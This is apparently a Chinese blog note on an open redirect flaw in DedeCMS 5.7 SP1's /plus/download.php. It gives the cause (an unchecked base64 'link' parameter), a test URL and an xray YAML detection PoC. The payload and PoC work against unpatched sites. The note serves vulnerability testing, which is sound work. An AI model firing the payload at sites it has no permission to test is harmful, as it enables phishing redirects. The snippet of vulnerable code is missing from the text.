xray扫描的过程中发现某站点存在任意url调整漏洞,此漏洞为dedecms的任意url调整漏洞。
影响范围:
dedecms 5.71sp1及以下的版本
漏洞形成的原因是跳转语句没有对参数link判断
- link参数的构造:
$link = base64_decode(urldecode($link));
- 跳转语句:
(dedecms 5.7sp1的/plus/download.php中67行)
测试流程:
http://www.baidu.com经过base64编码后为
aHR0cDovL3d3dy5iYWlkdS5jb20
待测试的网站后加上
/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20
如果成功跳转到baidu则表明存在此漏洞
最后贴上大佬cc_ci写的xray检测poc:
name: poc-yaml-dedecms-url-redirection
rules:
- method: GET
path: >-
/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
follow_redirects: false
expression: >
response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com"
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "V5.7 sp1"
links:
- https://blog.csdn.net/ystyaoshengting/article/details/82734888